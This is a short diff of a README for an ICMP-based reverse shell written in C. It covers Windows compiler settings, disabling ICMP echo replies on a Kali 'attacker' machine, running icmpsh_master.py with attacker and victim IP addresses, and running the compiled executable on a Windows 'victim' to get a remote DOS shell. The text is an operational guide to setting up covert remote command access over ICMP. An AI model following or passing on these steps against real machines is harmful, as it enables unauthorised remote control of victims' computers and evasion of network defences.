decay88/infoSec/ICMP_C_Rev_Shell/README.md

 		-Compile as: Compile as C code/TC
 		-Precompiled Headers: Not using precompiled headers
 		-Runtime library to Multi-threaded/MT (will include the visual c++ runtime in the exe) That should be enough.
-Generate it
-	Tested on Windows Server 2008 64bit, Windows 10 Home Edition 64 bit
+Generate it.
+Tested on Windows Server 2008 64bit, Windows 10 Home\Pro Edition 64 bit

+    On the attacker machine, of course a Kali box execute the master after having disabled ICMP replies (set to 0 to restore it)
+    #sysctl -w net.ipv4.icmp_echo_ignore_all=1

+    execute the master: icmpsh-master.py <attacker (master) IP address> <victim (slave) IP address>
+    ./icmpsh_master.py 192.168.1.66 192.168.1.17

+    Now the master is waiting for the incoming victim connection...

+    On the windows victim (slave) machine execute the compiled exe, check the Linux master box, you should get a DOS shell!